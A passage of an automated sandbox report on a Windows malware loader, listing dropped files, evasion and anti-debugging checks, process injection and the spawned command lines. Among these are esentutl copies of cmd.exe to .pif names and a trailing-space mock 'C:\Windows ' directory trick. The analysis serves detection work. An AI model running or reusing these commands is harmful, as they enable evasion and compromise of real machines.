                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Windows\System32\wbengine.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Windows\System32\VSSVC.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Windows\System32\AgentService.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                Source: C:\Windows\System32\FXSSVC.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                Source: C:\Windows\System32\AppVClient.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                Source: C:\Users\Public\alpha.pifAPI coverage: 6.3 %
                Source: C:\Users\Public\alpha.pifAPI coverage: 7.9 %
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFAPI coverage: 9.7 %
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifAPI coverage: 8.9 %
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFAPI coverage: 9.6 %
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 4784Thread sleep time: -150000s >= -30000sJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 4468Thread sleep time: -22136092888451448s >= -30000sJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 6772Thread sleep count: 5124 > 30Jump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 6772Thread sleep count: 4310 > 30Jump to behavior
                Source: C:\Windows\System32\alg.exe TID: 4520Thread sleep time: -90000s >= -30000s
                Source: C:\Windows\System32\alg.exe TID: 6164Thread sleep time: -60000s >= -30000s
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe TID: 3148Thread sleep time: -60000s >= -30000s
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 5240Thread sleep time: -260000s >= -30000s
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 5396Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\msdtc.exe TID: 2668Thread sleep count: 484 > 30
                Source: C:\Windows\System32\msdtc.exe TID: 2668Thread sleep time: -48400s >= -30000s
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 2944Thread sleep time: -250000s >= -30000s
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 5912Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\Public\xpha.pifLast function: Thread delayed
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile Volume queried: C:\ FullSizeInformation
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02AF5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,4_2_02AF5908
                Source: C:\Users\Public\alpha.pifCode function: 13_2_00020207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,13_2_00020207
                Source: C:\Users\Public\alpha.pifCode function: 13_2_0002589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,13_2_0002589A
                Source: C:\Users\Public\alpha.pifCode function: 13_2_00033E66 FindFirstFileW,FindNextFileW,FindClose,13_2_00033E66
                Source: C:\Users\Public\alpha.pifCode function: 13_2_00024EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,13_2_00024EC1
                Source: C:\Users\Public\alpha.pifCode function: 13_2_0001532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,13_2_0001532E
                Source: C:\Users\Public\alpha.pifCode function: 17_2_0002589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,17_2_0002589A
                Source: C:\Users\Public\alpha.pifCode function: 17_2_00020207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,17_2_00020207
                Source: C:\Users\Public\alpha.pifCode function: 17_2_00033E66 FindFirstFileW,FindNextFileW,FindClose,17_2_00033E66
                Source: C:\Users\Public\alpha.pifCode function: 17_2_00024EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,17_2_00024EC1
                Source: C:\Users\Public\alpha.pifCode function: 17_2_0001532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,17_2_0001532E
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\alg.exeThread delayed: delay time: 60000
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeThread delayed: delay time: 60000
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifThread delayed: delay time: 922337203685477
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifThread delayed: delay time: 922337203685477
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
                Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @Y2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
                Source: Jwsmvmdw.PIF, 0000001B.00000002.1662054093.00000000006CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>>a9
                Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wvid.infvid.devicedescMicrosoft Hyper-V Virtualization Infrastructure DriverN
                Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver4
                Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure DriverVHD Loopback Contr
                Source: x.exe, 00000004.00000002.1544141056.0000000000706000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWr
                Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00
                Source: x.exe, 00000004.00000002.1544141056.0000000000706000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1544141056.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1635254831.00000000005B2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2066991172.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1797911265.00000000005B2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.00000000005B2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2079470414.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.00000000005B2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1668502646.00000000005B2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1610304966.00000000005B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Devicen
                Source: AppVClient.exe, 00000016.00000003.1594100597.00000000004A0000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000016.00000002.1595686617.00000000004A1000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000016.00000003.1593875501.0000000000470000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine
                Source: xpha.pif, 00000012.00000002.1697939115.0000000002EAB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
                Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter\
                Source: Jwsmvmdw.PIF, 00000024.00000002.1753075839.0000000000638000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\AppData\Local\Temp\x.exeAPI call chain: ExitProcess graph end nodegraph_4-38277
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFAPI call chain: ExitProcess graph end node
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifAPI call chain: ExitProcess graph end node
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFAPI call chain: ExitProcess graph end node
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B0F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,4_2_02B0F744
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFProcess queried: DebugPort
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFProcess queried: DebugPort
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_1_0040CE09
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,#8,#8,#8,#15,#23,#24,#16,#411,@__unlockDebuggerData$qv,#9,#9,#9,12_1_004019F0
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B0894C LoadLibraryW,GetProcAddress,FreeLibrary,4_2_02B0894C
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_0047B594 mov eax, dword ptr fs:[00000030h]12_1_0047B594
                Source: C:\Users\Public\alpha.pifCode function: 13_2_0003C1FA mov eax, dword ptr fs:[00000030h]13_2_0003C1FA
                Source: C:\Users\Public\alpha.pifCode function: 17_2_0003C1FA mov eax, dword ptr fs:[00000030h]17_2_0003C1FA
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_0047B594 mov eax, dword ptr fs:[00000030h]30_2_0047B594
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_10001130 mov eax, dword ptr fs:[00000030h]30_2_10001130
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_10043F3D mov eax, dword ptr fs:[00000030h]30_2_10043F3D
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_1_0047B594 mov eax, dword ptr fs:[00000030h]30_1_0047B594
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_0040ADB0 GetProcessHeap,HeapFree,12_1_0040ADB0
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess token adjusted: DebugJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeProcess token adjusted: Debug
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Debug
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_1_0040CE09
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_1_0040E61C
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_1_00416F6A
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_004123F1 SetUnhandledExceptionFilter,12_1_004123F1
                Source: C:\Users\Public\alpha.pifCode function: 13_2_00026EC0 SetUnhandledExceptionFilter,13_2_00026EC0
                Source: C:\Users\Public\alpha.pifCode function: 13_2_00026B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00026B40
                Source: C:\Users\Public\alpha.pifCode function: 17_2_00026EC0 SetUnhandledExceptionFilter,17_2_00026EC0
                Source: C:\Users\Public\alpha.pifCode function: 17_2_00026B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00026B40
                Source: C:\Users\Public\xpha.pifCode function: 18_2_00893600 SetUnhandledExceptionFilter,18_2_00893600
                Source: C:\Users\Public\xpha.pifCode function: 18_2_00893470 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_00893470
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,30_2_0040CE09
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,30_2_0040E61C
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_00416F6A
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_004123F1 SetUnhandledExceptionFilter,30_2_004123F1
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_10041361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_10041361
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_10044C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,30_2_10044C7B
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,30_1_0040CE09
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,30_1_0040E61C
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_1_00416F6A
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_1_004123F1 SetUnhandledExceptionFilter,30_1_004123F1
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\AppData\Local\Temp\x.exe, Memory allocated: C:\Users\Public\Libraries\wdmvmswJ.pif base: 400000 protect: page execute and read and write
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF, Memory allocated: C:\Users\Public\Libraries\wdmvmswJ.pif base: 400000 protect: page execute and read and write
                Source: C:\Windows\SysWOW64\esentutl.exe, File created: C:\Users\Public\alpha.pif
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe, NtQuerySystemInformation: Indirect: 0x9B8462
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe, NtOpenKeyEx: Indirect: 0x140077B9B
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe, NtQueryValueKey: Indirect: 0x140077C9F
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe, NtClose: Indirect: 0x140077E81
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe, NtAdjustPrivilegesToken: Indirect: 0x9B864C
                Source: C:\Users\user\AppData\Local\Temp\x.exe, Section unmapped: C:\Users\Public\Libraries\wdmvmswJ.pif base address: 400000
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF, Section unmapped: C:\Users\Public\Libraries\wdmvmswJ.pif base address: 400000
                Source: C:\Users\user\AppData\Local\Temp\x.exe, Memory written: C:\Users\Public\Libraries\wdmvmswJ.pif base: 3FB008
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF, Memory written: C:\Users\Public\Libraries\wdmvmswJ.pif base: 2B0008
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF, Memory written: C:\Users\Public\Libraries\wdmvmswJ.pif base: 2E2008
                Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\E_dekont.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"
                Source: C:\Windows\System32\cmd.exe, Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                Source: C:\Users\user\AppData\Local\Temp\x.exe, Process created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif
                Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
                Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
                Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
                Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
                Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
                Source: C:\Users\Public\alpha.pif, Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF, Process created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_10028550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,wsprintfW,30_2_10028550
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,4_2_02AF5ACC
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetLocaleInfoA,4_2_02AFA7C4
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,4_2_02AF5BD8
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetLocaleInfoA,4_2_02AFA810
